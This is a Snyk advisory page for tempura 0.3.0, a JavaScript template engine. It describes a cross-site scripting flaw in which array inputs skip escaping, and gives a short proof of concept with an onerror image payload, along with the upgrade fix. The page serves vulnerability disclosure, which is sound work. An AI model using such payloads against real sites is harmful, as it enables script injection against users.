Homepage
About Snyk

tempura@0.3.0 vulnerabilities

A light, crispy, and delicious template engine

Go back to all versions of this package
Report a new vulnerability Found a mistake?

Direct Vulnerabilities

Known vulnerabilities in the tempura package. This does not include vulnerabilities belonging to this package’s dependencies.

Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.
Fix for free
Vulnerability Vulnerable Version
  • M
Cross-site Scripting (XSS)

tempura is an A light, crispy, and delicious template engine.

Affected versions of this package are vulnerable to Cross-site Scripting (XSS). If the input to the esc function is of type object (i.e an array) it is returned without being escaped/sanitized, leading to a potential Cross-Site Scripting vulnerability.

PoC

const tempura = require("tempura");

let template = `
    {{#expect name}}
    <p> Hello, {{name}} </p>
`

let render = tempura.compile(template)

let r1 = render({name: "<img src=x onerror='alert(1)' />"})
console.log(r1) // <p> Hello, &ltimg src=x onerror='alert(1)' /> </p>

let r2 = render({name: ["<img src=x onerror='alert(1)' />"]})
console.log(r2) // <p> Hello, <img src=x onerror='alert(1)' /> </p>

How to fix Cross-site Scripting (XSS)?

Upgrade tempura to version 0.4.0 or higher.

<0.4.0
Go back to all versions of this package